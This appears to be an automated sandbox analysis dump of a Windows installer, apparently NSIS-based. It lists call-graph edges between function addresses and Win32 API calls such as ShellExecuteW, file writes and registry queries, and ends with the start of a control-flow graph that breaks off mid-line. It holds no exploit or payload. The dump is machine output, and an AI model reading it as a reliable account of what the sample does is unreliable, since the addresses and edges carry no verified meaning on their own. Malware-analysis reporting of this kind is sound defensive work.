3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4127 401a1f 4128 40145c 18 API calls 4127->4128 4129 401a26 4128->4129 4130 4062a3 11 API calls 4129->4130 4131 401a49 4130->4131 4132 401a64 4131->4132 4133 401a5c 4131->4133 4181 406009 lstrcpynW 4132->4181 4180 406009 lstrcpynW 4133->4180 4136 401a62 4140 406038 5 API calls 4136->4140 4137 401a6f 4138 406722 3 API calls 4137->4138 4139 401a75 lstrcatW 4138->4139 4139->4136 4142 401a81 4140->4142 4141 4062d5 2 API calls 4141->4142 4142->4141 4143 405e30 2 API calls 4142->4143 4145 401a98 CompareFileTime 4142->4145 4146 401ba9 4142->4146 4150 4062a3 11 API calls 4142->4150 4154 406009 lstrcpynW 4142->4154 4160 406805 18 API calls 4142->4160 4167 405ca0 MessageBoxIndirectW 4142->4167 4171 401b50 4142->4171 4178 401b5d 4142->4178 4179 405e50 GetFileAttributesW CreateFileW 4142->4179 4143->4142 4145->4142 4147 404f72 25 API calls 4146->4147 4149 401bb3 4147->4149 4148 404f72 25 API calls 4151 401b70 4148->4151 4152 40337f 37 API calls 4149->4152 4150->4142 4155 4062a3 11 API calls 4151->4155 4153 401bc6 4152->4153 4156 4062a3 11 API calls 4153->4156 4154->4142 4162 401b8b 4155->4162 4157 401bda 4156->4157 4158 401be9 SetFileTime 4157->4158 4159 401bf8 FindCloseChangeNotification 4157->4159 4158->4159 4161 401c09 4159->4161 4159->4162 4160->4142 4163 401c21 4161->4163 4164 401c0e 4161->4164 4166 406805 18 API calls 4163->4166 4165 406805 18 API calls 4164->4165 4168 401c16 lstrcatW 4165->4168 4169 401c29 4166->4169 4167->4142 4168->4169 4170 4062a3 11 API calls 4169->4170 4172 401c34 4170->4172 4173 401b93 4171->4173 4174 401b53 4171->4174 4175 405ca0 MessageBoxIndirectW 4172->4175 4176 4062a3 11 API calls 4173->4176 4177 4062a3 11 API calls 4174->4177 4175->4162 4176->4162 4177->4178 4178->4148 4179->4142 4180->4136 4181->4137 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4078 4021b5 4079 40145c 18 API calls 4078->4079 4080 4021bb 4079->4080 4081 40145c 18 API calls 4080->4081 4082 4021c4 4081->4082 4083 40145c 18 API calls 4082->4083 4084 4021cd 4083->4084 4085 40145c 18 API calls 4084->4085 4086 4021d6 4085->4086 4087 404f72 25 API calls 4086->4087 4088 4021e2 ShellExecuteW 4087->4088 4089 40221b 4088->4089 4090 40220d 4088->4090 4092 4062a3 11 API calls 4089->4092 4091 4062a3 11 API calls 4090->4091 4091->4089 4093 402230 4092->4093 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4094 401eb9 4095 401f24 4094->4095 4096 401ec6 4094->4096 4097 401f53 GlobalAlloc 4095->4097 4098 401f28 4095->4098 4099 401ed5 4096->4099 4106 401ef7 4096->4106 4100 406805 18 API calls 4097->4100 4105 4062a3 11 API calls 4098->4105 4110 401f36 4098->4110 4101 4062a3 11 API calls 4099->4101 4104 401f46 4100->4104 4102 401ee2 4101->4102 4107 402708 4102->4107 4112 406805 18 API calls 4102->4112 4104->4107 4108 402387 GlobalFree 4104->4108 4105->4110 4116 406009 lstrcpynW 4106->4116 4108->4107 4118 406009 lstrcpynW 4110->4118 4111 401f06 4117 406009 lstrcpynW 4111->4117 4112->4102 4114 401f15 4119 406009 lstrcpynW 4114->4119 4116->4111 4117->4114 4118->4104 4119->4107 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                                          Executed Functions

                                                                          Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 